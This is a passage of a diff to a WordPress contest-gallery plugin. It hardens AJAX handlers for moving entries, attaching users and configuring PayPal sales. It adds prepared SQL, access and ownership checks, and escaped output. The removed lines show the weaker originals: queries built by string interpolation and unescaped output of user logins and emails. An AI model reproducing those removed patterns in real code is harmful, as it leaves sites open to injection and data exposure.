-				$InGalleryIDtoMove = absint($_POST['cg_in_gallery_id_to_move']);
-				$MoveFromGalleryID = absint($_POST['cgMoveFromGalleryID']);
-				$cgMoveCategory = absint($_POST['cgMoveCategory']);
-				$MoveAssigns = $_POST['cgMoveAssigns'];
+		global $wpdb;
+		$table_posts = $wpdb->prefix . "posts";
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
+		$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
+		$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+		$tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+		$sourceGalleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $MoveFromGalleryID));
+		if (empty($sourceGalleryExists)) {
+			cg_backend_ajax_error_json('Source gallery does not exist.', 400, 'cg_source_gallery_missing');
+		}

-				global $wpdb;
-				$table_posts = $wpdb->prefix . "posts";
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
-				$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
-				$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
-				$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$optionsInGalleryToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_options WHERE id = %d ORDER BY id DESC LIMIT 0, 1", $InGalleryIDtoMove));
+		if (empty($optionsInGalleryToMove)) {
+			cg_backend_ajax_error_json('Target gallery does not exist.', 400, 'cg_target_gallery_missing');
+		}

-				$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		$rowToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $cgMoveRealId, $MoveFromGalleryID));
+		if (empty($rowToMove)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected source gallery.', 400, 'cg_entry_source_mismatch');
+		}

-				$Version = cg_get_version_for_scripts();
+		if (!empty($rowToMove->EcommerceEntry)) {
+			cg_backend_ajax_error_json('E-commerce entries can not be moved to another gallery.', 400, 'cg_ecommerce_entry_move_blocked');
+		}

-				$wpdb->update(
-					"$tablename",
-					array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
-					array('id' => $insert_id),
-					array('%s'),
-					array('%d')
-				);
+		if (!empty($cgMoveCategory)) {
+			$categoryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_categories WHERE id = %d AND GalleryID = %d", $cgMoveCategory, $InGalleryIDtoMove));
+			if (empty($categoryExists)) {
+				cg_backend_ajax_error_json('Selected target category does not belong to the target gallery.', 400, 'cg_target_category_mismatch');
+			}
+		}

-				$row = $wpdb->get_row("SELECT * FROM $tablename WHERE id = $insert_id");
+		$MoveAssigns = array();
+		if (!empty($MoveAssignsRaw)) {
+			$formInputs = $wpdb->get_results($wpdb->prepare("SELECT id, GalleryID, Field_Type FROM $tablename_form_input WHERE GalleryID IN (%d,%d)", $MoveFromGalleryID, $InGalleryIDtoMove));
+			$sourceFields = array();
+			$targetFields = array();
+			foreach ($formInputs as $formInput) {
+				if (absint($formInput->GalleryID) == $MoveFromGalleryID) {
+					$sourceFields[absint($formInput->id)] = $formInput->Field_Type;
+				} elseif (absint($formInput->GalleryID) == $InGalleryIDtoMove) {
+					$targetFields[absint($formInput->id)] = $formInput->Field_Type;
+				}
+			}

-				// Delete previous entry because inserted as new one through cg_copy_table_row
-				$wpdb->query("DELETE FROM $tablename WHERE id = $cgMoveRealId");
+			$allowedMoveFieldTypes = array('date-f', 'text-f', 'url-f', 'email-f', 'comment-f', 'select-f', 'radio-f', 'chk-f');
+			$usedTargetFields = array();
+			foreach ($MoveAssignsRaw as $FromInput => $ToInput) {
+				$FromInput = absint($FromInput);
+				$ToInput = absint($ToInput);

-                // delete WpPages now
-				if(!empty($row->WpPage)){
-					wp_delete_post($row->WpPage,true);
+				if (empty($FromInput) || empty($ToInput)) {
+					cg_backend_ajax_error_json('Invalid field assignment data.', 400, 'cg_invalid_move_assignment');
 				}
-				if(!empty($row->WpPageUser)){
-					wp_delete_post($row->WpPageUser,true);
+				if (empty($sourceFields[$FromInput]) || empty($targetFields[$ToInput])) {
+					cg_backend_ajax_error_json('Field assignment does not belong to the selected galleries.', 400, 'cg_move_assignment_gallery_mismatch');
 				}
-				if(!empty($row->WpPageNoVoting)){
-					wp_delete_post($row->WpPageNoVoting,true);
+				if (!in_array($sourceFields[$FromInput], $allowedMoveFieldTypes, true) || $sourceFields[$FromInput] != $targetFields[$ToInput]) {
+					cg_backend_ajax_error_json('Field assignment types do not match.', 400, 'cg_move_assignment_type_mismatch');
 				}
-				if(!empty($row->WpPageWinner)){
-					wp_delete_post($row->WpPageWinner,true);
-				}
-				if(!empty($row->WpPageEcommerce)){
-					wp_delete_post($row->WpPageEcommerce,true);
+				if (!empty($usedTargetFields[$ToInput])) {
+					cg_backend_ajax_error_json('A target field can only be assigned once.', 400, 'cg_move_assignment_duplicate_target');
 				}

-                // Update parents
-				$optionsInGalleryToMove = $wpdb->get_row("SELECT * FROM $tablename_options WHERE id = $InGalleryIDtoMove ORDER BY id DESC LIMIT 0, 1");
+				$MoveAssigns[$FromInput] = $ToInput;
+				$usedTargetFields[$ToInput] = true;
+			}
+		}

-				if(!empty($optionsInGalleryToMove->WpPageParent)) {
-					$post_title = substr($row->NamePic,0,100);
-					cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
-				}
+		$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		if (empty($insert_id)) {
+			cg_backend_ajax_error_json('Entry could not be copied to the target gallery.', 500, 'cg_move_copy_failed');
+		}

-				if(!empty($cgMoveCategory)){
-					$wpdb->query("UPDATE $tablename SET Category=$cgMoveCategory WHERE id = $insert_id");
-				}else{
-					$wpdb->query("UPDATE $tablename SET Category=0 WHERE id = $insert_id");
-				}
+		$Version = cg_get_version_for_scripts();

-				$wpdb->query("UPDATE $tablename_ip SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_comments SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_entries SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-
-				$input_ids_entries_to_delete = $wpdb->get_results("SELECT id, f_input_id FROM $tablename_entries WHERE pid  = $insert_id");
-				$input_ids_entries_to_delete_array = [];
-                foreach ($input_ids_entries_to_delete as $entry){
-	                $input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
-                }
+		$updated = $wpdb->update(
+			"$tablename",
+			array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
+			array('id' => $insert_id),
+			array('%s','%d'),
+			array('%d')
+		);
+
+		if ($updated === false) {
+			$wpdb->delete($tablename, array('id' => $insert_id), array('%d'));
+			cg_backend_ajax_error_json('Copied entry could not be assigned to the target gallery.', 500, 'cg_move_assign_gallery_failed');
+		}

-                if(!empty($MoveAssigns)){// have to be checked with not empty
-                    // now change the input ids if were assigned
-	                foreach ($MoveAssigns as $FromInput => $ToInput){
-		                $FromInput = absint($FromInput);
-		                $ToInput = absint($ToInput);
-		                $wpdb->query("UPDATE $tablename_entries SET f_input_id = $ToInput WHERE pid = $insert_id && f_input_id = $FromInput");
-                        if(isset($input_ids_entries_to_delete_array[$FromInput])){
-	                        unset($input_ids_entries_to_delete_array[$FromInput]);
-                        }
-	                }
-                }
+		$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d", $insert_id));
+		if (empty($row)) {
+			cg_backend_ajax_error_json('Moved entry could not be loaded.', 500, 'cg_move_row_missing');
+		}

-				foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
-					$wpdb->query("DELETE FROM $tablename_entries WHERE id = $entryId");
-                }
+		$wpdb->delete($tablename, array('id' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'));

-				$wp_upload_dir = wp_upload_dir();
-                // unlink activated entries if exists
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
-				}
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
-				}
-                // move file
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
-                    if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
-	                    mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
-				}
-                // move folder
-				if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
-					if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
-						mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
-				}
+		// delete WpPages now
+		if(!empty($row->WpPage)){
+			wp_delete_post($row->WpPage,true);
+		}
+		if(!empty($row->WpPageUser)){
+			wp_delete_post($row->WpPageUser,true);
+		}
+		if(!empty($row->WpPageNoVoting)){
+			wp_delete_post($row->WpPageNoVoting,true);
+		}
+		if(!empty($row->WpPageWinner)){
+			wp_delete_post($row->WpPageWinner,true);
+		}
+		if(!empty($row->WpPageEcommerce)){
+			wp_delete_post($row->WpPageEcommerce,true);
+		}

-				cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+		// Update parents
+		if(!empty($optionsInGalleryToMove->WpPageParent)) {
+			$post_title = substr($row->NamePic,0,100);
+			cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
+		}

-                if($row->Active==1){
-	                $collect = "$tablename.id = ".$row->id;
-	                $GalleryID = $row->GalleryID;
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                                              OR
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($InGalleryIDtoMove,$row);
-                }
+		$wpdb->update($tablename, array('Category' => $cgMoveCategory), array('id' => $insert_id), array('%d'), array('%d'));

-				die;
+		$wpdb->update($tablename_ip, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_comments, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_entries, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+
+		$input_ids_entries_to_delete = $wpdb->get_results($wpdb->prepare("SELECT id, f_input_id FROM $tablename_entries WHERE pid = %d", $insert_id));
+		$input_ids_entries_to_delete_array = [];
+		foreach ($input_ids_entries_to_delete as $entry){
+			$input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
+		}

-			} else {
-				echo "<div id='cgSaveCategoriesCouldNotBeChanged'><h2>MISSINGRIGHTS<br>post_cg_social_platform_input can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		if(!empty($MoveAssigns)){
+			foreach ($MoveAssigns as $FromInput => $ToInput){
+				$wpdb->query($wpdb->prepare("UPDATE $tablename_entries SET f_input_id = %d WHERE pid = %d AND f_input_id = %d", $ToInput, $insert_id, $FromInput));
+				if(isset($input_ids_entries_to_delete_array[$FromInput])){
+					unset($input_ids_entries_to_delete_array[$FromInput]);
+				}
 			}
+		}

-			exit();
-		} else {
-			exit();
+		foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
+			$wpdb->query($wpdb->prepare("DELETE FROM $tablename_entries WHERE id = %d", $entryId));
+		}
+
+		$wp_upload_dir = wp_upload_dir();
+		// unlink activated entries if exists
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
+		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json");
 		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
+		}
+		// move file
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
+		}
+		// move folder
+		if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
+		}
+
+		cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+
+		if($row->Active==1){
+			$GalleryID = $row->GalleryID;
+			$rowForJson = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				 OR
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				 GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$row->id, $GalleryID, $row->id, $GalleryID
+			));
+			if (!empty($rowForJson)) {
+				cg_create_json_files_when_activating($InGalleryIDtoMove,$rowForJson);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $cgMoveRealId,
+			'new_entry_id' => $insert_id,
+			'target_gallery_id' => $InGalleryIDtoMove
+		));
 	}
 }
 // move to another gallery---- END
@@ -802,15 +921,15 @@

 	            $post_title = substr(cg_pre_process_name_for_url_name($post_title),0,100);

-            $array = [
+	            $array = [
                     'post_title'=> $post_title,
-	            'post_name'=> $post_name,
+                    'post_name'=> $post_name,
                     'guid'=> $guid,
                     'post_type'=>$post_type,
                     'post_content'=>$post_content,
                     'post_mime_type'=>$post_mime_type,
-	            'post_status'=>'publish'
-            ];
+                    'post_status'=>'publish'
+                ];

 	            $postId = wp_insert_post($array);

@@ -860,7 +979,6 @@
 	    global $wp_version;
 	    $sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';

-
 	    if (defined('DOING_AJAX') && DOING_AJAX) {

 		    $user = wp_get_current_user();
@@ -986,9 +1104,7 @@
 // youtube add to gallery ---- END

 // sort files
-
 add_action('wp_ajax_post_cg_gallery_sort_files', 'post_cg_gallery_sort_files');
-
 if (!function_exists('post_cg_gallery_sort_files')) {
     function post_cg_gallery_sort_files()
     {
@@ -1033,36 +1149,42 @@
 if (!function_exists('post_cg_attach_to_another_user_select')) {
 	function post_cg_attach_to_another_user_select()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
-
-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$wpUsers = $wpdb->base_prefix . "users";
-				$selectWPusers = $wpdb->get_results("SELECT ID, user_login, user_email FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC");
-
-                echo "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
-                    foreach ($selectWPusers as $user){
-                        echo "<option value='$user->ID' data-user_login='$user->user_login' data-user_email='$user->user_email'>$user->user_login - $user->user_email (ID: $user->ID)</option>";
-                    }
-                echo "</select>";
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
-			}
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+		$cgUserSearch = (!empty($_POST['cgUserSearch'])) ? sanitize_text_field($_POST['cgUserSearch']) : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		global $wpdb;
+
+		$wpUsers = $wpdb->base_prefix . "users";
+		if (!empty($cgUserSearch)) {
+			$like = '%' . $wpdb->esc_like($cgUserSearch) . '%';
+			$selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 AND (user_login LIKE %s OR user_email LIKE %s) ORDER BY user_login ASC LIMIT 20", $like, $like));
+		} else {
+			$selectWPusers = $wpdb->get_results("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC LIMIT 20");
+		}

-			exit();
+		$html = "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
+		if (empty($selectWPusers)) {
+			$html .= "<option value='' disabled selected>No users found</option>";
 		} else {
-			exit();
+			$isFirst = true;
+			foreach ($selectWPusers as $user){
+				$selected = ($isFirst) ? ' selected' : '';
+				$html .= "<option value='" . esc_attr($user->ID) . "' data-user_login='" . esc_attr($user->user_login) . "'" . $selected . ">" . esc_html($user->user_login) . " (ID: " . esc_html($user->ID) . ")</option>";
+				$isFirst = false;
+			}
 		}
+		$html .= "</select>";
+
+		wp_send_json_success(array(
+			'html' => $html,
+			'has_results' => (!empty($selectWPusers))
+		));
 	}
 }
 // attach to another user select --- END
@@ -1072,52 +1194,78 @@
 if (!function_exists('post_cg_attach_to_another_user')) {
 	function post_cg_attach_to_another_user()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			$user = wp_get_current_user();
+		global $wpdb;

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$table_posts = $wpdb->prefix . "posts";
-				#$wpUsers = $wpdb->prefix . "users";
-
-				$WpUserId = absint($_POST['cgAttachToAnotherUserId']);
-				$pid = absint($_POST['cgEntryId']);
-				$GalleryID = absint($_POST['GalleryID']);
-
-				$wpdb->query("UPDATE $tablename SET WpUserId=$WpUserId WHERE id = $pid");
-
-				$Active = $wpdb->get_var( "SELECT Active FROM $tablename WHERE id = $pid");
-
-                if($Active==1){
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($GalleryID,$row);
-                }
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$table_posts = $wpdb->prefix . "posts";
+
+		$WpUserId = (isset($_POST['cgAttachToAnotherUserId'])) ? absint($_POST['cgAttachToAnotherUserId']) : 0;
+		$pid = (!empty($_POST['cgEntryId'])) ? absint($_POST['cgEntryId']) : 0;
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		if (empty($pid) || empty($GalleryID)) {
+			cg_backend_ajax_error_json('Missing user assignment data.', 400, 'cg_missing_attach_data');
+		}

-				#$wpUser = $wpdb->get_row("SELECT user_login, user_email FROM $wpUsers WHERE ID = $WpUserId");
-				//echo "###".$wpUser->user_login." - ".$wpUser->user_email."###";
-				echo "###post_cg_attach_to_another_user successful###";
-
-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		$galleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $GalleryID));
+		if (empty($galleryExists)) {
+			cg_backend_ajax_error_json('Gallery does not exist.', 400, 'cg_attach_gallery_missing');
+		}
+
+		$rowToUpdate = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $pid, $GalleryID));
+		if (empty($rowToUpdate)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_attach_entry_gallery_mismatch');
+		}
+
+		$user_login = '';
+		if (!empty($WpUserId)) {
+			$wpUser = get_user_by('id', $WpUserId);
+			if (empty($wpUser)) {
+				cg_backend_ajax_error_json('Selected user does not exist.', 400, 'cg_attach_user_missing');
 			}
+			$user_login = $wpUser->user_login;
+		}

-			exit();
-		} else {
-			exit();
+		$updated = $wpdb->update(
+			$tablename,
+			array('WpUserId' => $WpUserId),
+			array('id' => $pid, 'GalleryID' => $GalleryID),
+			array('%d'),
+			array('%d','%d')
+		);
+
+		if ($updated === false) {
+			cg_backend_ajax_error_json('User assignment could not be saved.', 500, 'cg_attach_update_failed');
 		}
+
+		if($rowToUpdate->Active==1){
+			$row = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				  OR
+				  (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				  GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$pid, $GalleryID, $pid, $GalleryID
+			));
+			if (!empty($row)) {
+				$row->WpUserId = $WpUserId;
+				cg_create_json_files_when_activating($GalleryID,$row);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $pid,
+			'user_id' => $WpUserId,
+			'user_login' => $user_login,
+			'detached' => empty($WpUserId)
+		));
 	}
 }
 // attach to another user --- END
@@ -1147,11 +1295,11 @@
                     $isTest = true;
                 }

-                if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
-                    $accessToken='error' ;
-                }else{
-                    $accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
-                }
+				if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
+					$accessToken='error' ;
+				}else{
+					$accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
+				}

                 if($accessToken!='error' && $accessToken!='no-internet'){
                     echo '###cgkeytrue###';
@@ -1266,7 +1414,6 @@

 // AJAX Script für set comment ---- ENDE

-
 // show paypal transaction response

 add_action('wp_ajax_post_cg_show_paypal_api_response', 'post_cg_show_paypal_api_response');
@@ -1313,46 +1460,51 @@
 if(!function_exists('post_cg_set_for_paypal_sell')){
     function post_cg_set_for_paypal_sell() {

-	    // has to be unsanitized because of the url eventually configured by user
-	    $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
-        $_POST = cg1l_sanitize_post($_POST);
-	    $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
-
         contest_gal1ery_db_check();
+        cg_backend_ajax_require_access_json();

-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
+        if (empty($_POST['cgSellContainer']) || !is_array($_POST['cgSellContainer'])) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+        $cgSellContainer = $_POST['cgSellContainer'];
+        $GalleryID = (isset($cgSellContainer['GalleryID'])) ? absint($cgSellContainer['GalleryID']) : 0;
+        $realId = (isset($cgSellContainer['realId'])) ? absint($cgSellContainer['realId']) : 0;
+        $saleAction = (isset($cgSellContainer['saleAction'])) ? sanitize_text_field($cgSellContainer['saleAction']) : '';
+        $galleryHash = (isset($_POST['cgGalleryHash'])) ? sanitize_text_field($_POST['cgGalleryHash']) : '';

-        if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
+        cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);

-            $user = wp_get_current_user();
-
-            if (
-                is_super_admin($user->ID) ||
-                in_array( 'administrator', (array) $user->roles ) ||
-                in_array( 'editor', (array) $user->roles ) ||
-                in_array( 'author', (array) $user->roles )
-            ) {
+        if (empty($realId) || empty($GalleryID) || !in_array($saleAction, array('activate', 'deactivate'), true)) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-                cg_ecommerce_sale_conf();
+        global $wpdb;
+        $tablename = $wpdb->prefix . "contest_gal1ery";
+        $entry = $wpdb->get_row($wpdb->prepare("SELECT id, GalleryID, EcommerceEntry FROM $tablename WHERE id = %d", $realId));

-                die;
+        if (empty($entry)) {
+            cg_backend_ajax_error_json('Sale entry does not exist.', 400, 'cg_sale_entry_missing');
+        }

-            }else{
-                echo "MISSINGRIGHTS - This area can be edited only as administrator, editor or author.";
-                exit();
-            }
+        if (absint($entry->GalleryID) !== $GalleryID) {
+            cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_sale_entry_gallery_mismatch');
+        }

-            exit();
+        if ($saleAction === 'deactivate' && empty($entry->EcommerceEntry)) {
+            cg_backend_ajax_error_json('Sale entry is not active.', 400, 'cg_sale_entry_not_active');
         }
-        else {
-            exit();
+
+        // has to be unsanitized because of the url eventually configured by user
+        $AllUploadsUsedText = '';
+        if (isset($_POST['cgSellContainer']['AllUploadsUsedText'])) {
